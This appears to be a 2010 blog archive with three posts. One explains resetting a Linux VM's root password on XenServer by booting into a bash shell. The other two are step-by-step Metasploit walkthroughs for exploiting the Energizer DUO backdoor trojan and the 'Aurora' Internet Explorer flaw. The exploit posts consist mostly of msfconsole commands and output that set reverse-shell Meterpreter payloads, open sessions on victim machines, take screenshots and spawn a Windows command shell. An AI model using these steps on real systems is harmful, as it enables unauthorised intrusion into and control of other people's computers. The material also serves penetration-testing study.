Thursday, 13 May 2010

How To Reset A Forgotten root Password On A Linux Virtual Machine on XenServer

I recently had to carry out some maintenance on a Linux server hosted on our XenServer. However I had forgotten the root password. Lesson learned to save password in a secure location such as an encrypted usb stick or in an encrypted file on my cell phone. Anyway I digress, on the make it just work section.

From Xencenter select the virtual machine you want to boot in single user mode.

Shut down your virtual machine using the Xencenter controls.

Right click on the Boot Options for your virtual machine and select Properties.

Change the OS Boot Parameters to

rw init=/bin/bash

NOTE If you already have something in the OS Boot Parameters you will need to take note of this as you will need to put it back once the password reset is complete.

Save and Start your virtual machine

Your system will now boot up in single user mode.

Now its time to change your password

machinename# passwd root

Type in your new password you will then be asked to confirm it.

Your password has now been reset.
Shutdown your virtual machine.
machinename# shutdown -h now

Now go Back to the Xencenter Application and Startup options and remove rw init=/bin/bash and change it back to whatever was there before.
Start up your virtual machine and you should be able to logon with your new root password.

Wednesday, 10 March 2010

How To Exploit the Energizer Trojan

As of release version 8749, you can now use Metasploit to locate infected systems on your local network using the following commands.

# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 10.0.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] 10.0.0.23:7777 FOUND: [["F", "AUTOEXEC.BAT"] .......

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 10.0.0.23
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 10.0.0.253
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on 10.0.0.23:4444

[*] Trying to upload C:\NTL0ZTL4DhVL.exe...

[*] Trying to execute C:\NTL0ZTL4DhVL.exe...

[*] Sending stage (747008 bytes)

[*] Meterpreter session 1 opened (10.0.0.23:4444 -> 10.0.0.253:1200)

meterpreter > getuid
Server username: HACKME\TestUser

Wednesday, 20 January 2010

Reproducing the "Aurora" IE Exploit

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands in bold:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp


meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>